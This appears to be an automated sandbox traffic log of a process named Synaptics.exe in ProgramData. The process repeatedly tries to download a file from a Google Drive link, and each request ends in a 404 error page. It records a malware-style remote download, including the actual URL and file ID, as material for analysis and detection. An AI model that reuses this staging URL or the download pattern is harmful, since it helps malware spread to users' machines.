                                                                                              2025-01-02 19:28:49 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:28:49 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 44 63 6d 30 4f 6b 6b 71 6f 54 56 47 36 57 47 34 70 36 67 37 49 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="Dcm0OkkqoTVG6WG4p6g7Iw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:28:49 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              13192.168.2.749771142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:49 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=O3h5K0Mlym-rrLjhzGpk4j7uTinDx0L_6UzibdP1RDC_dxub7vgJKYEHbgEy2EUzTv6j_Scn4-yJmKWdQ7GPwv8A4sHSmxpOkYMPAnFnYaMPENGOIsuDmm1Y5WSmNZAxu3tfYoY7sv5Qty8H7UJa53mIoIRZkFIVFgAxzxyrueB1f-dHIGAb-TA


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              14192.168.2.749784142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:50 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:51 UTC1250INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4g0-41Yd7urjb8YlZe0p7oF1IxGPBtka-XDS_GqTinRWdaVfx2yLiyap4aTubjItYxVzoMiE8
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:50 GMT
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-Sd3jW0SFVWaRzaOeMy3xPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:51 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                              2025-01-02 19:28:51 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 7a 46 38 33 36 4c 5f 69 58 6b 4d 68 35 52 65 68 63 67 58 76 70 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                              Data Ascii: 404 (Not Found)!!1</title><style nonce="zF836L_iXkMh5RehcgXvpg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                              2025-01-02 19:28:51 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              15192.168.2.749783216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:51 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:50 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-BCfUkGMgFG3zLp8plAhpVw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              16192.168.2.749782216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:50 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:51 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:50 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-zygEOmeNgfJuFWBWaK_75w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              17192.168.2.749797216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:51 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:52 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:51 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-juquiHvLF0AvgM87g6YJjw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              18192.168.2.749796216.58.206.784434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:51 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Host: docs.google.com
                                                                                              Cache-Control: no-cache
                                                                                              2025-01-02 19:28:52 UTC1314INHTTP/1.1 303 See Other
                                                                                              Content-Type: application/binary
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:51 GMT
                                                                                              Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                              Strict-Transport-Security: max-age=31536000
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-WvJAjJVSnmmRMP29Lmn26Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Server: ESF
                                                                                              Content-Length: 0
                                                                                              X-XSS-Protection: 0
                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                              X-Content-Type-Options: nosniff
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Connection: close


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              19192.168.2.749795142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:52 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC4KJFiglguqkMGIEryVKLHFUgJ4hFALmh_HggJ5tjtOrYHTZmlaNMJxzxW8xayu0VW6
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:52 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-KbHBHt76ErsfzD2VjweSjA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:52 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:28:52 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4a 50 67 2d 32 6b 6a 71 47 78 6c 6d 6d 56 79 75 5a 2d 52 78 36 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="JPg-2kjqGxlmmVyuZ-Rx6w">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                              2025-01-02 19:28:52 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                              Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                              20192.168.2.749798142.250.186.1294434136C:\ProgramData\Synaptics\Synaptics.exe
                                                                                              TimestampBytes transferredDirectionData
                                                                                              2025-01-02 19:28:51 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                              User-Agent: Synaptics.exe
                                                                                              Cache-Control: no-cache
                                                                                              Host: drive.usercontent.google.com
                                                                                              Connection: Keep-Alive
                                                                                              Cookie: NID=520=Iza8T9_l1iZAYHDGJisrnaN8y5GuoKZB-AuhebVGsQd3ocqHadJ9D_IqHl6JbzFlsWNzgAmmfOiShudpkox3PtukW4MhcOi0X_YSXZs6ZTASBhK_6u7NJRPnRx_EcCwXaJeJVJhTrDFGVgT4USSbBkCZmJ4XUgLKDOyhSCLnPr6yFQ6WgW12aA0
                                                                                              2025-01-02 19:28:52 UTC1243INHTTP/1.1 404 Not Found
                                                                                              X-GUploader-UploadID: AFiumC6BGX44tbcQX5mNsOuorCDFlvfJweSN4AWdCeOkKlBF7Pw9YGo3O3FEugFdb9ktBL_0
                                                                                              Content-Type: text/html; charset=utf-8
                                                                                              Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                              Pragma: no-cache
                                                                                              Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                              Date: Thu, 02 Jan 2025 19:28:52 GMT
                                                                                              Cross-Origin-Opener-Policy: same-origin
                                                                                              Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                              Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                              Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                              Content-Security-Policy: script-src 'report-sample' 'nonce-wTGTtTGOg1pqd1QFcsiEgw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                              Content-Length: 1652
                                                                                              Server: UploadServer
                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                              Content-Security-Policy: sandbox allow-scripts
                                                                                              Connection: close
                                                                                              2025-01-02 19:28:52 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                              Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                              2025-01-02 19:28:52 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4e 69 2d 55 68 75 5a 63 2d 6c 6b 38 36 2d 51 46 32 6a 5f 67 46 41 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                              Data Ascii: t Found)!!1</title><style nonce="Ni-UhuZc-lk86-QF2j_gFA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
